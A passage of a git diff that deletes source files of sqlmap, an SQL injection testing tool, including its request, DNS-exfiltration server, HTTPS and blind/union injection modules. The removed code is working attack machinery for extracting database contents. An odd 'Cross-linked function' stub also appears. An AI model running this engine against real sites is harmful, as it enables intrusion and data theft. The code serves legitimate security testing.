token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): - for _ in conf.cj: - if _.name == conf.csrfToken: - token = _.value - if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): - if post: - post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) - elif get: - get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) - else: - get = "%s=%s" % (conf.csrfToken, token) - break - - if not token: - errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url) - if not conf.csrfUrl: - errMsg += ". You can try to rerun by providing " - errMsg += "a valid value for option '--csrf-url'" - raise SqlmapTokenException, errMsg - - if token: - for place in (PLACE.GET, PLACE.POST): - if place in conf.parameters: - if place == PLACE.GET and get: - get = _adjustParameter(get, conf.csrfToken, token) - elif place == PLACE.POST and post: - post = _adjustParameter(post, conf.csrfToken, token) - - for i in xrange(len(conf.httpHeaders)): - if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower(): - conf.httpHeaders[i] = (conf.httpHeaders[i][0], token) - - if conf.rParam: - def _randomizeParameter(paramString, randomParameter): - retVal = paramString - match = re.search(r"(\A|\b)%s=(?P[^&;]+)" % re.escape(randomParameter), paramString) - if match: - origValue = match.group("value") - retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) - return retVal - - for randomParameter in conf.rParam: - for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST): - if item in conf.parameters: - if item == PLACE.GET and get: - get = _randomizeParameter(get, randomParameter) - elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post: - post = _randomizeParameter(post, randomParameter) - elif item == PLACE.COOKIE and cookie: - cookie = _randomizeParameter(cookie, randomParameter) - elif item == PLACE.URI and uri: - uri = _randomizeParameter(uri, randomParameter) - - if conf.evalCode: - delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER - variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()} - originals = {} - keywords = keyword.kwlist - - if not get and PLACE.URI in conf.parameters: - query = urlparse.urlsplit(uri).query or "" - else: - query = None - - for item in filter(None, (get, post if not kb.postHint else None, query)): - for part in item.split(delimiter): - if '=' in part: - name, value = part.split('=', 1) - name = re.sub(r"[^\w]", "", name.strip()) - if name in keywords: - name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus)) - variables[name] = value - - if cookie: - for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): - if '=' in part: - name, value = part.split('=', 1) - name = re.sub(r"[^\w]", "", name.strip()) - if name in keywords: - name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True) - variables[name] = value - - while True: - try: - compiler.parse(conf.evalCode.replace(';', '\n')) - except SyntaxError, ex: - original = replacement = ex.text.strip() - for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: - if _ in keywords: - replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX)) - break - if original == replacement: - conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "") - break - else: - conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement) - else: - break - - originals.update(variables) - evaluateCode(conf.evalCode, variables) - - for variable in variables.keys(): - if variable.endswith(EVALCODE_KEYWORD_SUFFIX): - value = variables[variable] - del variables[variable] - variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value - - uri = variables["uri"] - - for name, value in variables.items(): - if name != "__builtins__" and originals.get(name, "") != value: - if isinstance(value, (basestring, int)): - found = False - value = getUnicode(value) - - regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) - if re.search(regex, (get or "")): - found = True - get = re.sub(regex, "\g<1>%s\g<3>" % value, get) - - if re.search(regex, (post or "")): - found = True - post = re.sub(regex, "\g<1>%s\g<3>" % value, post) - - if re.search(regex, (query or "")): - found = True - uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri) - - regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) - if re.search(regex, (cookie or "")): - found = True - cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) - - if not found: - if post is not None: - post += "%s%s=%s" % (delimiter, name, value) - elif get is not None: - get += "%s%s=%s" % (delimiter, name, value) - elif cookie is not None: - cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) - - if not conf.skipUrlEncode: - get = urlencode(get, limit=True) - - if post is not None: - if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): - post = getattr(post, UNENCODED_ORIGINAL_VALUE) - elif kb.postUrlEncode: - post = urlencode(post, spaceplus=kb.postSpaceToPlus) - - if timeBasedCompare: - if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: - clearConsoleLine() - - kb.responseTimes.setdefault(kb.responseTimeMode, []) - - if conf.tor: - warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " - warnMsg += "time-based injections because of its high latency time" - singleTimeWarnMessage(warnMsg) - - warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") - warnMsg += "larger statistical model, please wait" - dataToStdout(warnMsg) - - while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: - value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload - Connect.queryPage(value=value, content=True, raise404=False) - dataToStdout('.') - - dataToStdout(" (done)\n") - - elif not kb.testMode: - warnMsg = "it is very important to not stress the network adapter " - warnMsg += "during usage of time-based payloads to prevent potential " - warnMsg += "disruptions " - singleTimeWarnMessage(warnMsg) - - if not kb.laggingChecked: - kb.laggingChecked = True - - deviation = stdev(kb.responseTimes[kb.responseTimeMode]) - - if deviation > WARN_TIME_STDEV: - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - - warnMsg = "considerable lagging has been detected " - warnMsg += "in connection response(s). Please use as high " - warnMsg += "value for option '--time-sec' as possible (e.g. " - warnMsg += "10 or more)" - logger.critical(warnMsg) - - if conf.safeFreq > 0: - kb.queryCounter += 1 - if kb.queryCounter % conf.safeFreq == 0: - if conf.safeUrl: - Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) - elif kb.safeReq: - Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers) - - start = time.time() - - if kb.nullConnection and not content and not response and not timeBasedCompare: - noteResponseTime = False - - try: - pushValue(kb.pageCompress) - kb.pageCompress = False - - if kb.nullConnection == NULLCONNECTION.HEAD: - method = HTTPMETHOD.HEAD - elif kb.nullConnection == NULLCONNECTION.RANGE: - auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" - - _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) - - if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): - pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): - pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) - finally: - kb.pageCompress = popValue() - - if not pageLength: - try: - page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) - except MemoryError: - page, headers, code = None, None, None - warnMsg = "site returned insanely large response" - if kb.testMode: - warnMsg += " in testing phase. This is a common " - warnMsg += "behavior in custom WAF/IDS/IPS solutions" - singleTimeWarnMessage(warnMsg) - - if conf.secondOrder: - page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) - - threadData.lastQueryDuration = calculateDeltaSeconds(start) - threadData.lastPage = page - - kb.originalCode = kb.originalCode or code - - if kb.testMode: - kb.testQueryCount += 1 - - if timeBasedCompare: - return wasLastResponseDelayed() - elif noteResponseTime: - kb.responseTimes.setdefault(kb.responseTimeMode, []) - kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) - - if not response and removeReflection: - page = removeReflectiveValues(page, payload) - - kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None - kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None - - if content or response: - return page, headers - - if getRatioValue: - return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) - else: - return comparison(page, headers, code, getRatioValue, pageLength) - -def setHTTPHandlers(): # Cross-linked function - raise NotImplementedError diff --git a/lib/request/direct.py b/lib/request/direct.py deleted file mode 100644 index 8e2889f8..00000000 --- a/lib/request/direct.py +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import extractExpectedValue -from lib.core.common import getCurrentThreadData -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import isListLike -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import SQL_STATEMENTS -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.settings import UNICODE_ENCODING -from lib.utils.timeout import timeout - -def direct(query, content=True): - select = True - query = agent.payloadDirect(query) - query = agent.adjustLateValues(query) - threadData = getCurrentThreadData() - - if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): - query = "%s FROM DUAL" % query - - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement": - select = False - break - - if select and not query.upper().startswith("SELECT "): - query = "SELECT %s" % query - - logger.log(CUSTOM_LOGGING.PAYLOAD, query) - - output = hashDBRetrieve(query, True, True) - start = time.time() - - if not select and "EXEC " not in query.upper(): - _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) - elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): - output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) - hashDBWrite(query, output, True) - elif output: - infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] - logger.info(infoMsg) - threadData.lastQueryDuration = calculateDeltaSeconds(start) - - if not output: - return output - elif content: - if output and isListLike(output): - if len(output[0]) == 1: - output = [_[0] for _ in output] - - retVal = getUnicode(output, noneToNull=True) - return safecharencode(retVal) if kb.safeCharEncode else retVal - else: - return extractExpectedValue(output, EXPECTED.BOOL) diff --git a/lib/request/dns.py b/lib/request/dns.py deleted file mode 100644 index b619fbdf..00000000 --- a/lib/request/dns.py +++ /dev/null @@ -1,158 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import socket -import threading -import time - -class DNSQuery(object): - """ - Used for making fake DNS resolution responses based on received - raw request - - Reference(s): - http://code.activestate.com/recipes/491264-mini-fake-dns-server/ - https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py - """ - - def __init__(self, raw): - self._raw = raw - self._query = "" - - type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits - - if type_ == 0: # Standard query - i = 12 - j = ord(raw[i]) - - while j != 0: - self._query += raw[i + 1:i + j + 1] + '.' - i = i + j + 1 - j = ord(raw[i]) - - def response(self, resolution): - """ - Crafts raw DNS resolution response packet - """ - - retVal = "" - - if self._query: - retVal += self._raw[:2] # Transaction ID - retVal += "\x85\x80" # Flags (Standard query response, No error) - retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts - retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query - retVal += "\xc0\x0c" # Pointer to domain name - retVal += "\x00\x01" # Type A - retVal += "\x00\x01" # Class IN - retVal += "\x00\x00\x00\x20" # TTL (32 seconds) - retVal += "\x00\x04" # Data length - retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP - - return retVal - -class DNSServer(object): - def __init__(self): - self._check_localhost() - self._requests = [] - self._lock = threading.Lock() - self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - self._socket.bind(("", 53)) - self._running = False - self._initialized = False - - def _check_localhost(self): - response = "" - try: - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect(("", 53)) - s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com - response = s.recv(512) - except: - pass - finally: - if response and "google" in response: - raise socket.error("another DNS service already running on *:53") - - def pop(self, prefix=None, suffix=None): - """ - Returns received DNS resolution request (if any) that has given - prefix/suffix combination (e.g. prefix..suffix.domain) - """ - - retVal = None - - with self._lock: - for _ in self._requests: - if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I): - retVal = _ - self._requests.remove(_) - break - - return retVal - - def run(self): - """ - Runs a DNSServer instance as a daemon thread (killed by program exit) - """ - - def _(): - try: - self._running = True - self._initialized = True - - while True: - data, addr = self._socket.recvfrom(1024) - _ = DNSQuery(data) - self._socket.sendto(_.response("127.0.0.1"), addr) - - with self._lock: - self._requests.append(_._query) - - except KeyboardInterrupt: - raise - - finally: - self._running = False - - thread = threading.Thread(target=_) - thread.daemon = True - thread.start() - -if __name__ == "__main__": - server = None - try: - server = DNSServer() - server.run() - - while not server._initialized: - time.sleep(0.1) - - while server._running: - while True: - _ = server.pop() - - if _ is None: - break - else: - print "[i] %s" % _ - - time.sleep(1) - - except socket.error, ex: - if 'Permission' in str(ex): - print "[x] Please run with sudo/Administrator privileges" - else: - raise - except KeyboardInterrupt: - os._exit(0) - finally: - if server: - server._running = False diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py deleted file mode 100644 index 952f7fc0..00000000 --- a/lib/request/httpshandler.py +++ /dev/null @@ -1,104 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import distutils.version -import httplib -import socket -import urllib2 - -from lib.core.common import getSafeExString -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.settings import PYVERSION - -ssl = None -try: - import ssl as _ssl - ssl = _ssl -except ImportError: - pass - -_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))) - -class HTTPSConnection(httplib.HTTPSConnection): - """ - Connection class that enables usage of newer SSL protocols. - - Reference: http://bugs.python.org/msg128686 - """ - - def __init__(self, *args, **kwargs): - httplib.HTTPSConnection.__init__(self, *args, **kwargs) - - def connect(self): - def create_sock(): - sock = socket.create_connection((self.host, self.port), self.timeout) - if getattr(self, "_tunnel_host", None): - self.sock = sock - self._tunnel() - return sock - - success = False - - # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext - # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): - for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): - try: - sock = create_sock() - context = ssl.SSLContext(protocol) - _ = context.wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host) - if _: - success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: - self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) - - if kb.tlsSNI.get(self.host) is None: - kb.tlsSNI[self.host] = success - - if not success: - for protocol in _protocols: - try: - sock = create_sock() - _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol) - if _: - success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: - self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) - - if not success: - errMsg = "can't establish SSL connection" - if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.10"): - errMsg += " (please retry with Python >= 2.7.10)" - raise SqlmapConnectionException(errMsg) - -class HTTPSHandler(urllib2.HTTPSHandler): - def https_open(self, req): - return self.do_open(HTTPSConnection if ssl else httplib.HTTPSConnection, req) - -# Bug fix (http://bugs.python.org/issue17849) - -def _(self, *args): - return self._readline() - -httplib.LineAndFileWrapper._readline = httplib.LineAndFileWrapper.readline -httplib.LineAndFileWrapper.readline = _ diff --git a/lib/request/inject.py b/lib/request/inject.py deleted file mode 100644 index bd83287b..00000000 --- a/lib/request/inject.py +++ /dev/null @@ -1,492 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import cleanQuery -from lib.core.common import expandAsteriskForColumns -from lib.core.common import extractExpectedValue -from lib.core.common import getPublicTypeMembers -from lib.core.common import getTechniqueData -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import initTechnique -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import parseUnionPage -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import MAX_TECHNIQUES_PER_VALUE -from lib.core.settings import SQL_SCALAR_REGEX -from lib.core.threads import getCurrentThreadData -from lib.request.connect import Connect as Request -from lib.request.direct import direct -from lib.techniques.blind.inference import bisection -from lib.techniques.blind.inference import queryOutputLength -from lib.techniques.dns.test import dnsTest -from lib.techniques.dns.use import dnsUse -from lib.techniques.error.use import errorUse -from lib.techniques.union.use import unionUse - -def _goDns(payload, expression): - value = None - - if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: - if kb.dnsTest is None: - dnsTest(payload) - - if kb.dnsTest: - value = dnsUse(payload, expression) - - return value - -def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): - start = time.time() - value = None - count = 0 - - value = _goDns(payload, expression) - - if value is not None: - return value - - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) - - if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): - - if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): - expression = "SELECT %s FROM (%s)" % (field, expression) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - expression += " AS %s" % randomStr(lowercase=True, seed=hash(expression)) - - if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','): - nulledCastedField = agent.nullAndCastField(field) - injExpression = expression.replace(field, nulledCastedField, 1) - else: - injExpression = expression - length = queryOutputLength(injExpression, payload) - else: - length = None - - kb.inferenceMode = True - count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) - kb.inferenceMode = False - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) - logger.debug(debugMsg) - - return value - -def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): - outputs = [] - origExpr = None - - for field in expressionFieldsList: - output = None - - if field.startswith("ROWNUM "): - continue - - if isinstance(num, int): - origExpr = expression - expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) - - if "ROWNUM" in expressionFieldsList: - expressionReplaced = expression - else: - expressionReplaced = expression.replace(expressionFields, field, 1) - - output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) - - if isinstance(num, int): - expression = origExpr - - outputs.append(output) - - return outputs - -def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): - """ - Retrieve the output of a SQL query characted by character taking - advantage of an blind SQL injection vulnerability on the affected - parameter through a bisection algorithm. - """ - - initTechnique(kb.technique) - - query = agent.prefixQuery(kb.injection.data[kb.technique].vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - count = None - startLimit = 0 - stopLimit = None - outputs = BigArray() - - if not unpack: - return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) - - _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - - rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) - if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): - expressionFieldsList = [expressionFields] - - if len(expressionFieldsList) > 1: - infoMsg = "the SQL query provided has more than one field. " - infoMsg += "sqlmap will now unpack it into distinct queries " - infoMsg += "to be able to retrieve the output even if we " - infoMsg += "are going blind" - logger.info(infoMsg) - - # If we have been here from SQL query/shell we have to check if - # the SQL query might return multiple entries and in such case - # forge the SQL limiting the query output one entry at a time - # NOTE: we assume that only queries that get data from a table - # can return multiple entries - if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): - expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) - - if limitCond: - test = True - - if not stopLimit or stopLimit <= 1: - if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): - test = False - - if test: - # Count the number of SQL query entries output - countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] - countedExpression = expression.replace(expressionFields, countFirstField, 1) - - if " ORDER BY " in countedExpression.upper(): - _ = countedExpression.upper().rindex(" ORDER BY ") - countedExpression = countedExpression[:_] - - if not stopLimit: - count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) - - if isNumPosStrValue(count): - count = int(count) - - if batch or count == 1: - stopLimit = count - else: - message = "the SQL query provided can return " - message += "%d entries. How many " % count - message += "entries do you want to retrieve?\n" - message += "[a] All (default)\n[#] Specific number\n" - message += "[q] Quit" - test = readInput(message, default="a") - - if not test or test[0] in ("a", "A"): - stopLimit = count - - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - - elif test.isdigit() and int(test) > 0 and int(test) <= count: - stopLimit = int(test) - - infoMsg = "sqlmap is now going to retrieve the " - infoMsg += "first %d query output entries" % stopLimit - logger.info(infoMsg) - - elif test[0] in ("#", "s", "S"): - message = "how many? " - stopLimit = readInput(message, default="10") - - if not stopLimit.isdigit(): - errMsg = "invalid choice" - logger.error(errMsg) - - return None - - else: - stopLimit = int(stopLimit) - - else: - errMsg = "invalid choice" - logger.error(errMsg) - - return None - - elif count and not count.isdigit(): - warnMsg = "it was not possible to count the number " - warnMsg += "of entries for the SQL query provided. " - warnMsg += "sqlmap will assume that it returns only " - warnMsg += "one entry" - logger.warn(warnMsg) - - stopLimit = 1 - - elif (not count or int(count) == 0): - if not count: - warnMsg = "the SQL query provided does not " - warnMsg += "return any output" - logger.warn(warnMsg) - - return None - - elif (not stopLimit or stopLimit == 0): - return None - - try: - try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) - except OverflowError: - errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) - errMsg += "with switch '--fresh-queries'" - raise SqlmapDataException(errMsg) - - except KeyboardInterrupt: - print - warnMsg = "user aborted during dumping phase" - logger.warn(warnMsg) - - return outputs - - elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): - expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] - - outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - - return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None - -def _goBooleanProxy(expression): - """ - Retrieve the output of a boolean based SQL query - """ - - initTechnique(kb.technique) - - if conf.dnsName: - query = agent.prefixQuery(kb.injection.data[kb.technique].vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - output = _goDns(payload, expression) - - if output is not None: - return output - - vector = kb.injection.data[kb.technique].vector - vector = vector.replace("[INFERENCE]", expression) - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - - timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) - - output = hashDBRetrieve(expression, checkConf=True) - - if output is None: - output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False) - - if output is not None: - hashDBWrite(expression, output) - - return output - -def _goUnion(expression, unpack=True, dump=False): - """ - Retrieve the output of a SQL query taking advantage of an union SQL - injection vulnerability on the affected parameter. - """ - - output = unionUse(expression, unpack=unpack, dump=dump) - - if isinstance(output, basestring): - output = parseUnionPage(output) - - return output - -def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): - """ - Called each time sqlmap inject a SQL query on the SQL injection - affected parameter. - """ - - if conf.hexConvert: - charsetType = CHARSET_TYPE.HEXADECIMAL - - kb.safeCharEncode = safeCharEncode - kb.resumeValues = resumeValue - - if suppressOutput is not None: - pushValue(getCurrentThreadData().disableStdOut) - getCurrentThreadData().disableStdOut = suppressOutput - - try: - pushValue(conf.db) - pushValue(conf.tbl) - - if expected == EXPECTED.BOOL: - forgeCaseExpression = booleanExpression = expression - - if expression.upper().startswith("SELECT "): - booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") - else: - forgeCaseExpression = agent.forgeCaseStatement(expression) - - if conf.direct: - value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) - - elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): - query = cleanQuery(expression) - query = expandAsteriskForColumns(query) - value = None - found = False - count = 0 - - if query and not re.search(r"COUNT.*FROM.*\(.*DISTINCT", query, re.I): - query = query.replace("DISTINCT ", "") - - if not conf.forceDns: - if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - kb.technique = PAYLOAD.TECHNIQUE.UNION - kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] - fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion - - try: - value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) - except SqlmapConnectionException: - if not fallback: - raise - - count += 1 - found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - - if not found and 